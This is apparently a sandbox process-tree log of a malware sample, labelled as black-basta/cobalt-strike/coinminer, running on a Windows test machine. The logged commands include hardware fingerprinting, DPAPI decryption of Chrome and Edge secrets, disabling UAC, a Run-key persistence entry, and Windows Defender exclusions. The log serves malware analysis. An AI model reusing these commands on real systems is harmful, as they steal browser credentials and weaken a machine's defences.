    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:5224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:784
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:5616
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:3896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:3888
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:6024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:5932
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:4808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:5696
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:3848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:4128
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:4872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:2968
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:4392
  - - C:\Users\Admin\AppData\Local\Temp\python-installer.exe
      C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      PID:4928
    - - C:\Windows\Temp\{E5AF8B7A-3E2A-4B96-907E-004C46837339}\.cr\python-installer.exe
        
        "C:\Windows\Temp\{E5AF8B7A-3E2A-4B96-907E-004C46837339}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=548 -burn.filehandle.self=552 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        5⤵
        
        PID:2168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:1108
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:2436
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:4444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\xTONboFpfh.ps1""
      4⤵
      PID:1652
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\xTONboFpfh.ps1"
        5⤵
        
        PID:4036
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cbtlx40b\cbtlx40b.cmdline"
        6⤵
        
        PID:1052
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3880.tmp" "c:\Users\Admin\AppData\Local\Temp\cbtlx40b\CSC6AD280384A784911B213C33FC1A46A4.TMP"
        7⤵
        
        PID:5540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4796
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:4764
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:4432
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:5860
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:5200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:4964
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:1120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:5752
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:4312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:5248
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:3332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:1308
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:5568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:4616
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:4884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.LdmdQD6d5d""
      4⤵
      PID:5784
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.LdmdQD6d5d"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:5856
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:988
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:2924
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:4568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:5904
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:4048
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:5412
  - - C:\Users\Admin\AppData\Local\Temp\python-installer.exe
      C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      PID:1092
    - - C:\Windows\Temp\{2159A310-E167-4422-B377-B733945F1D6F}\.cr\python-installer.exe
        
        "C:\Windows\Temp\{2159A310-E167-4422-B377-B733945F1D6F}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=544 -burn.filehandle.self=552 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        5⤵
        
        PID:4992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:1016
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:3668
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:660
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:5448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:4668
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:4876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:5200
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:1212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:4808
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:5848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:1728
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
1⤵
PID:976
- C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
  "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
  2⤵
  PID:4032
- - C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
    "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /quiet /burn.log.append "C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250404041341.log" InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
    3⤵
    PID:5316
  - - C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
      "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" -burn.filehandle.attached=520 -burn.filehandle.self=540 /quiet /burn.log.append "C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250404041341.log" InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      PID:5216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
1⤵
PID:1720
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:1920
- C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
  "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
  2⤵
  PID:684
- - C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
    "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /quiet /burn.log.append "C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250404041341.log" InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
    3⤵
    PID:2856
  - - C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
      "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" -burn.filehandle.attached=520 -burn.filehandle.self=552 /quiet /burn.log.append "C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250404041341.log" InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      PID:5416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:628
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:224
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:5028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\zaX4bb9lRH.ps1""
      4⤵
      PID:4156
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\zaX4bb9lRH.ps1"
        5⤵
        
        PID:748
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mkujkrot\mkujkrot.cmdline"
        6⤵
        
        PID:4824
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4E79.tmp" "c:\Users\Admin\AppData\Local\Temp\mkujkrot\CSCC100C005F5404119B44E8D46DA183688.TMP"
        7⤵
        
        PID:3372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:1120
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:1168
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:3016
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:5332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:4840
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:3684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:784
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:2228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:4796
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:4792
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:2604
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:5732
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4952
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:5768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:1212
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:1700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.nxwvHOIrWg""
      4⤵
      PID:5528
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.nxwvHOIrWg"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4896
